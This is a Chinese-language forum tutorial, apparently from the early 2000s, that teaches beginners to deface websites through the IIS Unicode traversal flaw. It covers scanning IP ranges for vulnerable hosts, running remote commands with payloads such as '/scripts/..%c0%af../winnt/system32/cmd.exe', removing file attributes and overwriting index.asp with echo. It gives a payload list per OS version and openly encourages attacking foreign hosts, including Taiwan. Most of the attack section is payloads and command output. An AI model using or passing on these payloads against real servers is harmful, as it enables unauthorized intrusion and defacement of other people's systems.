今天起床照例对着电脑发呆。反正闲着也是闲着，就又开始放屁了。呵，不臭不臭。
昨天看了老菜写的UNICODE漏洞贴子。好吧就顺着这个题目继续发挥。
--------------
你如果已经能用UNICODE漏洞攻击了，就不用看了。呵呵。

这篇文章十分适合初学者，如果你现在很想很想做黑客，又或者你刚学但看着那么多教程，好象在看天书，看不懂，那么你往下看，就算你一点也不懂黑技术（至少懂点电脑知识吧）跟着我一步一步做，你就也能简单的修改网站了（注意：学会后不能入侵国内主机，要黑就黑外国的。本文的用意是想能够全民皆兵，到下次再有外国黑客侵略我们时，能有更多的人参战。切记）因为中国法律很严，你不懂法呀？我的主页有中国计算机法律，你以前用过DOS吗？用过的话就能容易理解以下教程，如果你是WINDOWS温室下长大的话，就比较难理解，但跟着一步一步做也能成功。（想想当年用的DOS3.0 -3.3-4.0-5.0------5555555)

现在黑网站有很多方法，很多工具。下面讲的方法是相对其他方法简便，和实用的。这个方法是通过UNICODE漏洞进行攻击的。首先我们需要的工具是：IE版本5.0以上的浏览器，RANGSCAN扫描器
就行了。（RANGSCAN扫描器很多站点都有，找不到可以来我主页下。（呵，变相宣传，我的主页 http://feitiango.51.net )
------------------
第一步，运行RANGSCAN扫描器，会出现扫描窗口，在最上面有两个from的横框，这是让你填一段IP范围的。在第一个框里填入启始域（打个比方，比如你要扫100.100.100.100至100.100.100.255）那么你在第一个框里就填入100.100.100.100，在to 后面的框里填入100.100.100.255 意思就是扫100.100.100.100至100.100.100.255这段范围里有UNICODE漏洞的机器。接着在中间有一个添加的横框，是要填入内容的如：
/scripts/..%c0%af../winnt/system32/cmd.exe
这句话的意思是扫描有 %c0%af 漏洞的机器，对象一般是英文的WIN2000机。
我们把/scripts/..%c0%af../winnt/system32/cmd.exe填入框里，再按一下添加。这时这句话就
添到了下面的大框中了。我们再按“扫描”。就看到RANGSCAN开始扫了。这时就要看你选的IP范围有漏洞的机器多不多了，如果你选的IP范围好，呵，很快在扫描结果框里就会显示扫到的漏洞主机
如 100.100.100.111/scripts/..%c0%af../winnt/system32/cmd.exe
意思是 100.100.100.111主机有 %c0%af 漏洞，我们有目标了。GO GO GO
------------------------
目标有了，我们马上打开浏览器。在网址栏里输入：
100.100.100.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 回车
意思是查看机器里C盘的根目录。一般情况下，我们都可以在浏览器里看到类似如：
Directory of c:\

2001-06-11 03:47p 289 default.asp
2001-06-11 03:47p 289 default.htm
2001-03-09 04:35p <DIR> Documents and Settings
2001-06-11 03:47p 289 index.asp
2001-06-11 03:47p 289 index.htm
2001-05-08 05:19a <DIR> Inetpub
2001-05-19 10:37p <DIR> MSSQL7
2001-03-09 04:22p <DIR> Program Files
2001-05-23 06:21p <DIR> WINNT
4 File(s) 1,156 bytes
5 Dir(s) 2,461,421,568 bytes free
------------------------------
的目录列表。也会碰到看不到文件的空目录。我建议你找下一台机器，（呵，方法是有，边幅有限不说了）。
好，我们成功看到了机器里的C盘了，学过DOS的网友会很容易理解，看得明白。没学过DOS的就看熟它，看多几次就熟了，大部分机器都差不多的，大同小异罢了。
我们在浏览器里输入：
100.100.100.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+set 回车
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:

ALLUSERSPROFILE=C:\Documents and Settings\All Users
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=ON
ComSpec=C:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=100.100.100.111
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98; Win 9x 4.90)
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTPS=off
INSTANCE_ID=1
LOCAL_ADDR=100.100.100.111
NUMBER_OF_PROCESSORS=1
Os2LibPath=C:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=C:\WINNT\system32;C:\WINNT;C:\WINNT\System32\Wbem;C:\MSSQL7\BINN
PATH_TRANSLATED=c:\inetpub\wwwroot
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Fa
-----------------
哈，我们看到了机器设置内容了，我们找找，主要看PATH_TRANSLATED=c:\inetpub\wwwroot
意思是他的主页存放在c:\inetpub\wwwroot的目录里，知道就好办了。
我们用命令：
100.100.100.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot回车
我们就可以看到c:\inetpub\wwwroot目录里的文件了，一般都有default.asp, default.htm , index.htm, index.asp,等等。我们以目录里有index.asp做例子。
我们先要做的是把文件的只读属性解除掉，因为很多管理员都把文件设置只读。
我们用命令：
100.100.100.111/scripts/..%c0%af../winnt/system32/attrib.exe?%20-r%20-h%20c:\inetpub\wwwroot\index.asp 回车
当看到下面的英文
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
呵呵，恭喜你，你可以改他的网页了。
----------------------------------------
但如果你看到下面的英文就不成功，换其他机器吧
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Access denied - C:\inetpub\wwwroot\index.asp
-----------------------------
好，我们继续。现在最简单的方法就是用ECHO改网页的内容。
100.100.100.111/scripts/..%c0%af../winnt/system32/cmd".exe?/c+echo+提醒网站有漏洞+> c:\inetpub\wwwroot\index.asp 回车
当看到
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
的提示，你已经改了他的网页了，当你上网登陆他网站时，他的网页会一片空白中有提醒网站有漏洞几个字。呵呵，你想改成什么字也行。只要把命令中的中文换成你自己的中文就行了。

好，以上是十分顺利的例子。当初我自学的时候可没那么顺利，每一步都要卡一卡我。上面所讲的是一个正常操作过程。只要你们按着上面的一步一步来，就可以成功。当然，在你们试的过程中也会碰到其他教程没讲的问题。你们可以问呀。这里高手多的是。呵，写累了，也没口饮料喝。

谢谢论坛提供地方。我屁又放完了，呵呵

另外附上RANGSCAN里添加的列表：
中文WIN2000
/scripts/..%c0%2f../winnt/system32/cmd.exe
/scripts/..%c1%1c../winnt/system32/cmd.exe
不要用中文的漏洞扫国内机器，可以扫台湾等地区。
WIN NT4
/scripts/..%c1%9c../winnt/system32/cmd.exe

英文WIN2000
/scripts/..%c0%af../winnt/system32/cmd.exe

再次声明，本教程只是为了让大家初步理解掌握，所以教程里只提到用ECHO，来提醒管理员注意安全，没提怎样删改主机，所以我没违反论坛条例，呵呵。我怕被关进论坛监狱呀。
如果还有兴趣，请到我的主页坐坐：http://feitiango.51.net